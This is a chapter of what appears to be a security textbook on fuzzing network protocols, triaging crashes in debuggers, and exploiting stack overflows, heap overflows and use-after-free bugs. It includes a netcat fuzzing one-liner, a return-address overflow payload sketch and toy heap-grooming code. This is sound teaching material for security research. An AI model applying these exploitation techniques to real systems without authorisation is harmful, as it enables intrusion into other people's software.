10
FINDING AND EXPLOITING SECURITY VULNERABILITIES

Parsing the structure of a complex network protocol can be tricky, especially if the protocol parser is written in a memory-unsafe programming language, such as C/C++. Any mistake could lead to a serious vulnerability, and the complexity of the protocol makes it difficult to analyze for such vulnerabilities. Capturing all the possible interactions between the incoming protocol data and the application code that processes it can be an impossible task.

This chapter explores some of the ways you can identify security vulnerabilities in a protocol by manipulating the network traffic going to and from an application. I’ll cover techniques such as fuzz testing and debugging that allow you to automate the process of discovering security issues. I’ll also put together a quick-start guide on triaging crashes to determine their root cause and their exploitability. Finally, I’ll discuss the exploitation of common security vulnerabilities, what modern platforms do to mitigate exploitation, and ways you can bypass these exploit mitigations.

Fuzz Testing

Any software developer knows that testing the code is essential to ensure that the software behaves correctly. Testing is especially important when it comes to security. Vulnerabilities exist where a software application’s behavior differs from its original intent. In theory, a good set of tests ensures that this doesn’t happen. However, when working with network protocols, it’s likely you won’t have access to any of the application’s tests, especially in proprietary applications. Fortunately, you can create your own tests.

Fuzz testing, commonly referred to as fuzzing, is a technique that feeds random, and sometimes not-so-random, data into a network protocol to try to crash the processing application and thereby identify vulnerabilities. This technique tends to yield results no matter the complexity of the protocol. Fuzz testing involves producing multiple test cases, essentially modified network protocol structures, which are then sent to an application for processing. These test cases can be generated automatically using random modifications or under direction from the analyst.

The Simplest Fuzz Test

Developing a set of fuzz tests for a particular protocol is not necessarily a complex task. At its simplest, a fuzz test can just send random garbage to the network endpoint and see what happens.

For this example, we’ll use a Unix-style system and the Netcat tool. Execute the following on a shell to yield a simple fuzzer:

$ cat /dev/urandom | nc hostname port

This one-line shell command reads data from the system’s random number generator device using the cat command. The resulting random data is piped into netcat, which opens a connection to a specified endpoint as instructed.

This simple fuzzer will likely only yield a crash on simple protocols with few requirements. It’s unlikely that simple random generation would create data that meets the requirements of a more complex protocol, such as valid checksums or magic values. That said, you’d be surprised how often a simple fuzz test can give you valuable results; because it’s so quick to do, you might as well try it. Just don’t use this fuzzer on a live industrial control system managing a nuclear reactor!

Mutation Fuzzer

Often, you’ll need to be more selective about what data you send to a network connection to get the most useful information. The simplest technique in this case is to use existing protocol data, mutate it in some way, and then send it to the receiving application. This mutation fuzzer can work surprisingly well.

Let’s start with the simplest possible mutation fuzzer: a random bit flipper. Listing 10-1 shows a basic implementation of this type of fuzzer.

void SimpleFuzzer(const char* data, size_t length) {
   size_t position = RandomInt(length);
   size_t bit = RandomInt(8);

   char* copy = CopyData(data, length);
   copy[position] ^= (1 << bit);
   SendData(copy, length);
}

Listing 10-1: A simple random bit flipper mutation fuzzer

The SimpleFuzzer() function takes in the data to fuzz and the length of the data, and then generates a random number between 0 and length - 1 to select which byte of the data to modify. Next, it decides which bit in that byte to change by generating a number between 0 and 7. Then it toggles the bit using the XOR operation and sends the mutated data to its network destination.

This function works when, by random chance, the fuzzer modifies a field in the protocol that is then used incorrectly by the application. For example, your fuzzer might modify a length field set to 0x40 by converting it to a length field of 0x80000040. This modification might result in an integer overflow if the application multiplies it by 4 (for an array of 32-bit values, for example). This modification could also cause the data to be malformed, which would confuse the parsing code and introduce other types of vulnerabilities, such as an invalid command identifier that results in the parser accessing an incorrect location in memory.

You could mutate more than a single bit in the data at a time. However, by mutating single bits, you’re more likely to localize the effect of the mutation to a similar area of the application’s code. Changing an entire byte could result in many different effects, especially if the value is used for a set of flags.

You’ll also need to recalculate any checksums or critical fields, such as total length values after the data has been fuzzed. Otherwise, the resulting parsing of the data might fail inside a verification step before it ever gets to the area of the application code that processes the mutated value.

Generating Test Cases

When performing more complex fuzzing, you'll need to be smarter with your modifications and understand the protocol well enough to target specific data types. The more data an application has to parse, the more complex the parsing code becomes, and in many cases inadequate checks are made at the edge cases of protocol values, such as length fields. If we already know how the protocol is structured, we can generate our own test cases from scratch.

Generating our own test cases gives us precise control over the protocol fields used and their sizes. It also allows us to test protocol values that might never appear in captured traffic, exercising more of the application's code and reaching areas that are likely to be less well tested. The trade-off is that generated test cases are more complex to develop, and careful thought must be given to the kinds you want to generate.

Vulnerability Triaging

After you’ve run a fuzzer against a network protocol and the processing application has crashed, you’ve almost certainly found a bug. The next step is to find out whether that bug is a vulnerability and what type of vulnerability it might be, which depends on how and why the application crashed. To do this analysis, we use vulnerability triaging: taking a series of steps to search for the root cause of a crash. Sometimes the cause is clear and easy to track down. Other times, a vulnerability corrupts the application’s state but the crash doesn’t occur until seconds, if not hours, after the corruption takes place. This section describes ways to triage vulnerabilities and increase your chances of finding the root cause of a particular crash.

Debugging Applications

Different platforms allow different levels of control over your triaging. For an application running on Windows, macOS, or Linux, you can attach a debugger to the process. But on an embedded system, you might only have crash reports in the system log to go on. For debugging, I use CDB on Windows, GDB on Linux, and LLDB on macOS. All these debuggers are used from the command line, and I’ll provide some of the most useful commands for debugging your processes.

Starting Debugging

To start debugging, you’ll first need to attach the debugger to the application you want to debug. You can either run the application directly under the debugger from the command line or attach the debugger to an already-running process based on its process ID. Table 10-1 shows the various commands you need for running the three debuggers.

Table 10-1: Commands for Running Debuggers on Windows, Linux, and macOS

Debugger   New process                          Attach process
CDB        cdb application.exe [arguments]      cdb -p PID
GDB        gdb --args application [arguments]   gdb -p PID
LLDB       lldb -- application [arguments]      lldb -p PID

Because the debugger suspends execution of the process after you’ve created or attached it, you’ll need to set the process running again. You can issue the commands in Table 10-2 in the debugger’s shell to start the process execution, or to resume execution if you attached to an existing process. Where a command has alternative forms, they’re separated by commas.

Table 10-2: Simplified Application Execution Commands

Debugger   Start execution          Resume execution
CDB        g                        g
GDB        run, r                   continue, c
LLDB       process launch, run, r   thread continue, c

When the process you’re debugging creates a child process, it might be the child that crashes rather than the parent. This is especially common on Unix-like platforms, because some network servers fork the current process to handle each new connection by creating a copy of the process. In these cases, you need to ensure you’re following the child process, not the parent. You can use the commands in Table 10-3 to debug the child processes.

Table 10-3: Debugging the Child Processes

Debugger   Enable child process debugging         Disable child process debugging
CDB        .childdbg 1                            .childdbg 0
GDB        set follow-fork-mode child             set follow-fork-mode parent
LLDB       process attach --name NAME --waitfor   exit debugger

There are some caveats to using these commands. On Windows with CDB, you can debug all processes from one debugger. However, with GDB, setting the debugger to follow the child will stop the debugging of the parent. You can work around this somewhat on Linux by using the set detach-on-fork off command. This command suspends debugging of the parent process while continuing to debug the child and then reattaches to the parent once the child exits. However, if the child runs for a long time, the parent might never be able to accept any new connections.

LLDB does not have an option to follow child processes. Instead, you need to start a new instance of LLDB and use the attach syntax shown in Table 10-3, which automatically attaches to new processes based on the process name. Replace NAME in the LLDB command with the name of the process to follow.

Analyzing the Crash

With the debugger attached, you can run the application while fuzzing it and wait for the program to crash. You should look for crashes that indicate corrupted memory—for example, crashes that occur when trying to read or write to invalid addresses, or trying to execute code at an invalid address. When you’ve identified an appropriate crash, inspect the state of the application to work out the reason for the crash, such as a memory corruption or an array-indexing error.

First, determine the type of crash that has occurred from the output the debugger prints to the console. For example, CDB on Windows typically prints the crash type, which will be something like Access violation, and the debugger will try to print the instruction at the current program location where the application crashed. For GDB and LLDB on Unix-like systems, you’ll instead see the signal type: the most common is SIGSEGV, for segmentation fault, which indicates that the application tried to access an invalid memory location.

As an example, Listing 10-2 shows what you’d see in CDB if the application tried to execute an invalid memory address.

(2228.1b44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000000`41414141 ??              ???

Listing 10-2: An example crash in CDB showing invalid memory address

After you’ve determined the type of crash, the next step is to determine which instruction caused the application to crash so you’ll know what in the process state you need to look up. Notice in Listing 10-2 that the debugger tried to print the instruction at which the crash occurred, but the memory location was invalid, so it returns a series of question marks. When the crash occurs due to reading or writing invalid memory, you’ll get a full instruction instead of the question marks. If the debugger shows that you’re executing valid instructions, you can disassemble the instructions surrounding the crash location using the commands in Table 10-4.

Table 10-4: Instruction Disassembly Commands

Debugger   Disassemble from crash location   Disassemble a specific location
CDB        u                                 u ADDR
GDB        disassemble                       disassemble ADDR
LLDB       disassemble --frame               disassemble --start-address ADDR

To display the processor’s register state at the point of the crash, you can use the commands in Table 10-5.

Table 10-5: Displaying and Setting the Processor Register State

Debugger   Show general purpose registers   Show specific register   Set specific register
CDB        r                                r @rcx                   r @rcx = NEWVALUE
GDB        info registers                   info registers rcx       set $rcx = NEWVALUE
LLDB       register read                    register read rcx        register write rcx NEWVALUE

You can also use these commands to set the value of a register, which allows you to keep the application running by fixing the immediate cause of the crash and resuming execution. For example, if the crash occurred because RCX pointed to an invalid memory location, you could set RCX to a valid memory location and continue execution. However, execution might not continue successfully for very long if the application’s state is already corrupted.

One important detail to note is how the registers are specified. In CDB, you use the syntax @NAME to specify a register in an expression (for example, when building up a memory address). For GDB and LLDB, you typically use $NAME instead. GDB and LLDB also have a couple of pseudo registers: $pc, which refers to the memory location of the instruction currently executing (which would map to RIP on x64), and $sp, which refers to the current stack pointer.

When the application you’re debugging crashes, you’ll want to display how the current function in the application was called, because this provides important context to determine what part of the application triggered the crash. Using this context, you can narrow down which parts of the protocol you need to focus on to reproduce the crash.

You can get this context by generating a stack trace, which displays the functions that were called prior to the execution of the vulnerable function, including, in some cases, local variables and arguments passed to those functions. Table 10-6 lists commands to create a stack trace.

Table 10-6: Creating a Stack Trace

Debugger   Display stack trace   Display stack trace with arguments
CDB        K                     Kb
GDB        backtrace             backtrace full
LLDB       backtrace

You can also inspect memory locations to determine what caused the current instruction to crash; use the commands in Table 10-7.

Table 10-7: Displaying Memory Values

Debugger   Display bytes, words, dwords, qwords   Display ten 1-byte values
CDB        db, dw, dd, dq ADDR                    db ADDR L10
GDB        x/b, x/h, x/w, x/g ADDR                x/10b ADDR
LLDB       memory read --size 1,2,4,8 ADDR        memory read --size 1 --count 10 ADDR

Each debugger allows you to control how the values in memory are displayed, such as the size of each unit read (from 1 to 8 bytes) as well as the amount of data to print.

Another useful command determines what type of memory an address corresponds to, such as heap memory, stack memory, or a mapped executable. Knowing the type of memory helps narrow down the type of vulnerability. For example, if a memory value corruption has occurred, you can distinguish whether you’re dealing with a stack memory or heap memory corruption. You can use the commands in Table 10-8 to determine the layout of the process memory and then look up what type of memory an address corresponds to.

Table 10-8: Commands for Displaying the Process Memory Map

Debugger   Display process memory map
CDB        !address
GDB        info proc mappings
LLDB       No direct equivalent

Of course, there’s a lot more to the debugger that you might need to use in your triage, but the commands provided in this section should cover the basics of triaging a crash.

Example Crashes

Now let’s look at some examples of crashes so you’ll know what they look like for different types of vulnerabilities. I’ll just show Linux crashes in GDB, but the crash information you’ll see on different platforms and debuggers should be fairly similar. Listing 10-3 shows an example crash from a typical stack buffer overflow.

GNU gdb 7.7.1
(gdb) r
Starting program: /home/user/triage/stack_overflow

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) x/i $pc
=> 0x41414141:  Cannot access memory at address 0x41414141
(gdb) x/16xw $sp-16
0xbffff620:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff630:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff640:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff650:     0x41414141      0x41414141      0x41414141      0x41414141

Listing 10-3: An example crash from a stack buffer overflow

The input data was a series of repeating A characters, shown here as the hex value 0x41. The program has crashed trying to execute the memory address 0x41414141. The fact that the address contains repeated copies of our input data is indicative of memory corruption, because the memory values should reflect the current execution state (such as pointers into the stack or heap) and are very unlikely to be the same value repeated. We double-check that the reason for the crash is that there’s no executable code at 0x41414141 by asking GDB to disassemble the instruction at the crash location with x/i $pc; GDB indicates that it cannot access memory at that location. The crash doesn’t necessarily mean a stack overflow has occurred, so to confirm, we dump memory around the current stack pointer. By moving back 16 bytes from the stack pointer, we can see that our input data has definitely corrupted the stack.

The problem with this crash is that it’s difficult to determine which part of the code is vulnerable. The application crashed when calling an invalid location, which means the function that executed the return instruction is no longer directly referenced, and the corrupted stack makes it difficult to extract calling information. In this case, you could look at the stack memory below the corruption to search for a return address left on the stack by the vulnerable function, which can be used to track down the culprit. Listing 10-4 shows a crash resulting from a heap buffer overflow, which is considerably more involved than the stack memory corruption.

user@debian:~/triage$ gdb ./heap_overflow
GNU gdb 7.7.1

(gdb) r
Starting program: /home/user/triage/heap_overflow

Program received signal SIGSEGV, Segmentation fault.
0x0804862b in main ()
(gdb) x/i $pc
=> 0x804862b <main+112>:        mov    (%eax),%eax

(gdb) info registers $eax
eax            0x41414141       1094795585

(gdb) x/5i $pc
=> 0x804862b <main+112>:        mov    (%eax),%eax
   0x804862d <main+114>:        sub    $0xc,%esp
   0x8048630 <main+117>:        pushl  -0x10(%ebp)
   0x8048633 <main+120>:        call   *%eax
   0x8048635 <main+122>:        add    $0x10,%esp

(gdb) disassemble
Dump of assembler code for function main:
   ...
   0x08048626 <+107>:   mov    -0x10(%ebp),%eax
   0x08048629 <+110>:   mov    (%eax),%eax
=> 0x0804862b <+112>:   mov    (%eax),%eax
   0x0804862d <+114>:   sub    $0xc,%esp
   0x08048630 <+117>:   pushl  -0x10(%ebp)
   0x08048633 <+120>:   call   *%eax

(gdb) x/w $ebp-0x10
0xbffff708:     0x0804a030

(gdb) x/4w 0x0804a030
0x804a030:      0x41414141      0x41414141      0x41414141      0x41414141

(gdb) info proc mappings
process 4578
Mapped address spaces:

    Start Addr    End Addr       Size  Offset  objfile
     0x8048000   0x8049000     0x1000     0x0  /home/user/triage/heap_overflow
     0x8049000   0x804a000     0x1000     0x0  /home/user/triage/heap_overflow
     0x804a000   0x806b000    0x21000     0x0  [heap]
    0xb7cce000  0xb7cd0000     0x2000     0x0
    0xb7cd0000  0xb7e77000   0x1a7000     0x0  /lib/libc-2.19.so

Listing 10-4: An example crash from a heap buffer overflow

Again we get a crash, but this time it’s at a valid instruction, one that copies a value from the memory location pointed to by EAX back into EAX. It’s likely that the crash occurred because EAX points to invalid memory. Printing the register shows that the value of EAX is just our overflow character repeated, which is a sign of corruption.

We disassemble a little further and find that the value of EAX is being used as the address of a function that a subsequent call *%eax instruction will invoke. Dereferencing a value from another value indicates that the code being executed is a virtual function lookup from a virtual function table (VTable). We confirm this by disassembling a few instructions prior to the crashing one: we see that a value is read from memory, then that value is dereferenced (this would be reading the VTable pointer), and finally it is dereferenced again, causing the crash.

Although showing that the crash occurs when dereferencing a VTable pointer doesn’t immediately verify the corruption of a heap object, it’s a good indicator. To verify heap corruption, we extract the object pointer stored at $ebp-0x10 and check whether the memory it points to is filled with the 0x41414141 pattern, which was our input value during testing. Finally, to check whether that memory is in the heap, we use the info proc mappings command to dump the process memory map; from it, we can see that the address we extracted, 0x0804a030, falls within the [heap] region. Correlating the memory address with the mappings indicates that the memory corruption is isolated to the heap.

Finding that the corruption is isolated to the heap doesn’t necessarily point to the root cause of the vulnerability, but we can at least find information on the stack to determine what functions were called to get to this point. Knowing what functions were called would narrow down the range of functions you would need to reverse engineer to determine the culprit.

Improving Your Chances of Finding the Root Cause of a Crash

Tracking down the root cause of a crash can be difficult. If the stack memory is corrupted, you lose the information on which function was being called at the time of the crash. For a number of other types of vulnerabilities, such as heap buffer overflows or use-after-free, it’s possible the crash will never occur at the location of the vulnerability. It’s also possible that the corrupted memory is set to a value that doesn’t cause the application to crash at all, leading to a change of application behavior that cannot easily be observed through a debugger.

Ideally, you want to improve your chances of identifying the exact point in the application that’s vulnerable without exerting a significant amount of effort. I’ll present a few ways of improving your chances of narrowing down the vulnerable point.

Rebuilding Applications with Address Sanitizer

If you’re testing an application on a Unix-like OS, there’s a reasonable chance you have the source code for the application. This alone provides you with many advantages, such as full debug information, but it also means you can rebuild the application and add improved memory error detection to improve your chances of discovering vulnerabilities.

One of the best tools for adding this improved functionality when rebuilding is Address Sanitizer (ASan), an extension for the Clang C compiler that detects memory corruption bugs. If you specify the -fsanitize=address option when running the compiler (you can usually specify this option using the CFLAGS environment variable), the rebuilt application will have additional instrumentation to detect common memory errors, such as out-of-bounds reads and writes, use-after-free, and double-free.

The main advantage of ASan is that it stops the application as soon as possible after the vulnerable condition has occurred. If a heap allocation overflows, ASan stops the program and prints the details of the vulnerability to the shell console. For example, Listing 10-5 shows a part of the output from a simple heap overflow.

==3998==ERROR: AddressSanitizer: heap-buffer-overflow on address
0xb6102bf4 at pc 0x081087ae bp 0xbf9c64d8 sp 0xbf9c64d0
WRITE of size 1 at 0xb6102bf4 thread T0

    #0 0x81087ad (/home/user/triage/heap_overflow+0x81087ad)
    #1 0xb74cba62 (/lib/i386-linux-gnu/i686/cmov/libc.so.6+0x19a62)
    #2 0x8108430 (/home/user/triage/heap_overflow+0x8108430)

Listing 10-5: Output from ASan for a heap buffer overflow

Notice that the output contains the type of bug encountered (in this case a heap-buffer-overflow), whether the invalid access was a read or a write along with its size (here, a WRITE of size 1), the memory address being written, and a stack trace showing the location in the application that caused the overflow. By using this information with a debugger, as shown in the previous section, you should be able to track down the root cause of the vulnerability.

However, notice that the locations inside the application are just memory addresses. Source code files and line numbers would be more useful. To retrieve them in the stack trace, we need to set some environment variables to enable symbolization, as shown in Listing 10-6. The application will also need to be built with debugging information, which we can do by passing the -g flag to Clang.

$ export ASAN_OPTIONS=symbolize=1
$ export ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer-3.5
$ ./heap_overflow
=================================================================
==4035==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb6202bf4 at pc 0x081087ae bp 0xbf97a418 sp 0xbf97a410
WRITE of size 1 at 0xb6202bf4 thread T0
    #0 0x81087ad in main /home/user/triage/heap_overflow.c:8:3
    #1 0xb75a4a62 in __libc_start_main /build/libc-start.c:287
    #2 0x8108430 in _start (/home/user/triage/heap_overflow+0x8108430)

Listing 10-6: Output from ASan for a heap buffer overflow with symbol information

The majority of Listing 10-6 is the same as Listing 10-5. The big difference is that the crash’s location now reflects the location inside the original source code (in this case, starting at line 8, character 3 inside the file heap_overflow.c) instead of a memory location inside the program. Narrowing down the location of the crash to a specific line in the program makes it much easier to inspect the vulnerable code and determine the reason for the crash.

Windows Debug and Page Heap

On Windows, access to the source code of the application you’re testing is probably more restricted, so you’ll need ways to improve your chances when working with existing binaries. Windows comes with the Page Heap, which you can enable to improve your chances of tracking down a memory corruption.

You need to manually enable the Page Heap for the process you want to debug by running the following command as an administrator:

C:\> gflags.exe -i appname.exe +hpa

The gflags application comes installed with the CDB debugger. The -i parameter allows you to specify the image filename to enable the Page Heap on. Replace appname.exe with the name of the application you’re testing. The +hpa parameter is what actually enables the Page Heap when the application next executes.

The Page Heap works by allocating special, OS-defined memory pages (called guard pages) after every heap allocation. If an application tries to read or write these special guard pages, an error will be raised and the debugger will be notified immediately, which is useful for detecting a heap buffer overflow. If the overflow writes immediately at the end of the buffer, the guard page will be touched by the application and an error will be raised instantly. Figure 10-1 shows how this process works in practice.

image

Figure 10-1: The Page Heap detecting an overflow

You might assume that the Page Heap would be a good way of stopping heap memory corruption in production, but the Page Heap wastes a huge amount of memory because each allocation needs a separate guard page. Setting up the guard pages also requires a system call per allocation, which reduces allocation performance. On the whole, enabling the Page Heap for anything other than debugging sessions would not be a great idea.

Exploiting Common Vulnerabilities

After researching and analyzing a network protocol, you’ve fuzzed it and found some vulnerabilities you want to exploit. Chapter 9 describes many types of security vulnerabilities but not how to exploit those vulnerabilities, which is what I’ll discuss here. I’ll start with how you can exploit memory corruptions and then discuss some of the more unusual vulnerability types.

The aims of vulnerability exploitation depend on the purpose of your protocol analysis. If the analysis is on a commercial product, you might be looking for a proof of concept that clearly demonstrates the issue so the vendor can fix it: in that case, reliability isn’t as important as a clear demonstration of what the vulnerability is. On the other hand, if you’re developing an exploit for use in a Red Team exercise and are tasked with compromising some infrastructure, you might need an exploit that is reliable, works on many different product versions, and executes the next stage of your attack.

Working out ahead of time what your exploitation objectives are ensures you don’t waste time on irrelevant tasks. Whatever your goals, this section provides you with a good overview of the topic and more in-depth references for your specific needs. Let’s begin with exploiting memory corruptions.

Exploiting Memory Corruption Vulnerabilities

Memory corruptions, such as stack and heap overflows, are very common in applications written in memory-unsafe languages, such as C/C++. It’s difficult to write a complex application in such programming languages without introducing at least one memory corruption vulnerability. These vulnerabilities are so common that it’s relatively easy to find information about how to exploit them.

An exploit needs to trigger the memory corruption vulnerability in such a way that the state of the program changes to execute arbitrary code. This might involve hijacking the executing state of the processor and redirecting it to some executable code provided in the exploit. It might also mean modifying the running state of the application in such a way that previously inaccessible functionality becomes available.

The development of the exploit depends on the corruption type and what parts of the running application the corruption affects, as well as the kind of anti-exploit mitigations the application uses to make exploitation of a vulnerability more difficult to succeed. First, I’ll talk about the general principles of exploitation, and then I’ll consider more complex scenarios.

Stack Buffer Overflows

Recall that a stack buffer overflow occurs when code underestimates the length of a buffer to copy into a location on the stack, causing overflow that corrupts other data on the stack. Most serious of all, on many architectures the return address for a function is stored on the stack, and corruption of this return address gives the user direct control of execution, which you can use to execute any code you like. One of the most common techniques to exploit a stack buffer overflow is to corrupt the return address on the stack to point to a buffer containing shell code with instructions you want to execute when you achieve control. Successfully corrupting the stack in this way results in the application executing code it was not expecting.

In an ideal stack overflow, you have full control over the contents and length of the overflow, ensuring that you have full control over the values you overwrite on the stack. Figure 10-2 shows an ideal stack overflow vulnerability in operation.

image

Figure 10-2: A simple stack overflow exploit

The stack buffer we’ll overflow is below the return address for the function. When the overflow occurs, the vulnerable code fills up the buffer and then overwrites the return address with the value 0x12345678. The vulnerable function completes its work and tries to return to its caller, but the calling address has been replaced with an arbitrary value pointing to the memory location of some shell code placed there by the exploit. The return instruction executes, and the exploit gains control over code execution.

Writing an exploit for a stack buffer overflow is simple enough in the ideal situation: you just need to craft your data into the overflowed buffer to ensure the return address points to a memory region you control. In some cases, you can even add the shell code to the end of the overflow and set the return address to jump to the stack. Of course, to jump into the stack, you’ll need to find the memory address of the stack, which might be possible because the stack won’t move very frequently.

However, the properties of the vulnerability you discovered can create issues. For example, if the vulnerability is caused by a C-style string copy, you won’t be able to use embedded 0 bytes in the overflow because C uses a 0 byte as the terminating character for the string: the overflow will stop immediately once a 0 byte is encountered in the input data. An alternative is to place the shell code at an address whose value contains no 0 bytes, for example, on the heap, by forcing the application to make allocation requests you control.
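As a concrete sketch, the payload for an ideal overflow is just filler up to the saved return address followed by the address you want execution redirected to. The offset and target address below are hypothetical values you would have to determine experimentally for a real target; the final line shows how a C-style string copy truncates the payload at the first embedded 0 byte.

```python
import struct

# Hypothetical payload builder for an ideal stack overflow: the offset
# to the saved return address and the target address are assumptions
# you would discover for the real target.
def build_overflow(offset, ret_addr):
    addr = struct.pack("<Q", ret_addr)  # little-endian 64-bit address
    return b"A" * offset + addr

payload = build_overflow(64, 0x12345678)

# A C-style string copy stops at the first 0 byte, so the high zero
# bytes of the packed address cut off anything placed after them.
copied = payload.split(b"\x00")[0]
```

Note that the packed 64-bit address itself contains high zero bytes, which is exactly why a string-copy overflow constrains the addresses you can use.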

Heap Buffer Overflows

Exploiting heap buffer overflows can be more involved than exploiting an overflow on the stack because heap buffers are often in a less predictable memory address. This means there is no guarantee you’ll find something as easily corruptible as the function return address in a known location. Therefore, exploiting a heap overflow requires different techniques, such as control of heap allocations and accurate placement of useful, corruptible objects.

The most common technique for gaining control of code execution for a heap overflow is to exploit the structure of C++ objects, specifically their use of VTables. A VTable is a list of pointers to functions that the object implements. The use of virtual functions allows a developer to make new classes derived from existing base classes and override some of the functionality, as illustrated in Figure 10-3.

image

Figure 10-3: VTable implementation

To support virtual functions, each allocated instance of a class must contain a pointer to the memory location of the function table. When a virtual function is called on an object, the compiler generates code that looks up the address of the virtual function table, then looks up the virtual function inside the table, and finally calls that address. Typically, we can’t corrupt the pointers in the table because it’s likely the table is stored in a read-only part of memory. But we can corrupt the pointer to the VTable and use that to gain code execution, as shown in Figure 10-4.

image

Figure 10-4: Gaining code execution through VTable address corruption

Use-After-Free Vulnerability

A use-after-free vulnerability is not so much a corruption of memory but a corruption of the state of the program. The vulnerability occurs when a memory block is freed but a pointer to that block is still stored by some part of the application. Later in the application’s execution, the pointer to the freed block is reused, possibly because the application code assumes the pointer is still valid. Between the time that the memory block is freed and the block pointer is reused, there’s opportunity to replace the contents of the memory block with arbitrary values and use that to gain code execution.

When a memory block is freed, it will typically be given back to the heap to be reused for another memory allocation; therefore, as long as you can issue an allocation request of the same size as the original allocation, there’s a strong possibility that the freed memory block would be reused with your crafted contents. We can exploit use-after-free vulnerabilities using a technique similar to abusing VTables in heap overflows, as illustrated in Figure 10-5.

The application first allocates an object p on the heap, which contains a VTable pointer we want to gain control of. Next, the application calls delete on the pointer to free the associated memory. However, the application doesn’t reset the value of p, so this object is free to be reused in the future.

image

Figure 10-5: An example of a use-after-free vulnerability

Although it’s shown in the figure as being free memory, the original values from the first allocation may not actually have been removed. This makes it difficult to track down the root cause of a use-after-free vulnerability. The reason is that the program might continue to work fine even if the memory is no longer allocated, because the contents haven’t changed.

Finally, the exploit makes an allocation of an appropriate size with contents it controls, which the heap allocator services by reusing the freed block that p still points to. If the application then reuses p to call a virtual function, we control the VTable lookup and gain direct code execution.
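The sequence can be sketched with a toy allocator (purely illustrative, not a real heap) that, like Figure 10-5, leaves freed contents in place and hands the freed slot straight back to the next same-size allocation:

```python
# Toy model of use-after-free: freeing does not clear the contents,
# and the next same-size allocation reuses the slot, so a stale
# pointer now refers to attacker-controlled data.
memory = {}
free_slots = []

def alloc(data):
    # Reuse a freed slot if one exists; otherwise take a fresh address.
    addr = free_slots.pop() if free_slots else 0x1000 + 0x100 * len(memory)
    memory[addr] = data
    return addr

def free(addr):
    free_slots.append(addr)  # naive free: contents left in place

p = alloc("vtable -> legitimate functions")
free(p)                                     # freed, but p is not reset
q = alloc("vtable -> attacker functions")   # same-size reallocation
stale = memory[p]                           # use through the stale pointer
```

Because the allocator reuses the freed slot, the application's stale pointer p and the exploit's new allocation q refer to the same address.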

Manipulating the Heap Layout

Most of the time, the key to successfully exploiting a heap-based vulnerability is in forcing a suitable allocation to occur at a reliable location, so it’s important to manipulate the layout of the heap. Because there is such a large number of different heap implementations on various platforms, I’m only able to provide general rules for heap manipulation.

The heap implementation for an application may be based on the virtual memory management features of the platform the application is executing on. For example, Windows has the API function VirtualAlloc, which allocates a block of virtual memory for the current process. However, using the OS virtual memory allocator introduces a couple of problems:

Poor performance Each allocation and free-up requires the OS to switch to kernel mode and back again.

Wasted memory At a minimum, virtual memory allocations are done at page level, which is usually at least 4096 bytes. If you allocate memory smaller than the page size, the rest of the page is wasted.

Due to these problems, most heap implementations call on the OS services only when absolutely necessary. Instead, they allocate a large memory region in one go and then implement user-level code to apportion that larger allocation into small blocks to service allocation requests.

Efficiently dealing with memory freeing is a further challenge. A naive implementation might just allocate a large memory region and then increment a pointer in that region for every allocation, returning the next available memory location when requested. This will work, but it’s virtually impossible to then free that memory: the larger allocation could only be freed once all suballocations had been freed. This might never happen in a long-running application.

An alternative to the simplistic sequential allocation is to use a free-list. A free-list maintains a list of freed allocations inside a larger allocation. When a new heap is created, the OS creates a large allocation in which the free-list would consist of a single freed block the size of the allocated memory. When an allocation request is made, the heap’s implementation scans the list of free blocks looking for a free block of sufficient size to contain the allocation. The implementation would then allocate the requested block at the start of that free block and update the free-list to reflect the new free size.

When a block is freed, the implementation can add that block to the free-list. It could also check whether the memory before and after the newly freed block is also free and attempt to coalesce those free blocks to deal with memory fragmentation, which occurs when many small allocated blocks are freed, returning the blocks to available memory for reuse. However, free-list entries only record their individual sizes, so if an allocation larger than any of the free-list entries is requested, the implementation might need to further expand the OS allocated region to satisfy the request. An example of a free-list is shown in Figure 10-6.

image

Figure 10-6: An example of a simple free-list implementation

Using this heap implementation, you should be able to see how you would obtain a heap layout appropriate to exploiting a heap-based vulnerability. Say, for example, you know that the heap block you’ll overflow is 128 bytes; you can find a C++ object with a VTable pointer that’s at least the same size as the overflowable buffer. If you force the application to allocate a large number of these objects, they’ll end up being allocated sequentially in the heap. You can selectively free one of these objects (it doesn’t matter which one), and there’s a good chance that when you allocate the vulnerable buffer, it will reuse the freed block. Then you can execute your heap buffer overflow and corrupt the allocated object’s VTable to get code execution, as illustrated in Figure 10-7.
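The grooming sequence just described can be sketched with a toy first-fit free-list allocator. This is a deliberate simplification (real heap implementations are far more involved), but it shows why the vulnerable buffer lands in the hole left by the freed object:

```python
# Toy first-fit free-list allocator to illustrate heap grooming: spray
# same-size objects, free one, and the next same-size allocation
# reuses the hole left behind.
class ToyHeap:
    def __init__(self):
        self.next_addr = 0x10000
        self.free_list = []              # (addr, size) of freed blocks

    def alloc(self, size):
        for i, (addr, fsize) in enumerate(self.free_list):
            if fsize >= size:            # first fit
                del self.free_list[i]
                return addr
        addr = self.next_addr            # no free block: extend the heap
        self.next_addr += size
        return addr

    def free(self, addr, size):
        self.free_list.append((addr, size))

heap = ToyHeap()
objects = [heap.alloc(128) for _ in range(8)]  # spray objects with VTables
heap.free(objects[3], 128)                     # free one victim object
vulnerable_buf = heap.alloc(128)               # reuses the freed slot
```

The overflowable buffer is now allocated directly before the next sprayed object, so overflowing it corrupts that object's VTable pointer, as in Figure 10-7.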

image

Figure 10-7: Allocating memory buffers to ensure correct layout

When manipulating heaps, the biggest challenge in a network attack is the limited control over memory allocations. If you’re exploiting a web browser, you can use JavaScript to trivially set up the heap layout, but for a network application, it’s more difficult. A good place to look for object allocations is in the creation of a connection. If each connection is backed by a C++ object, you can control allocation by just opening and closing connections. If that method isn’t suitable, you’ll almost certainly have to exploit the commands in the network protocol for appropriate allocations.

Defined Memory Pool Allocations

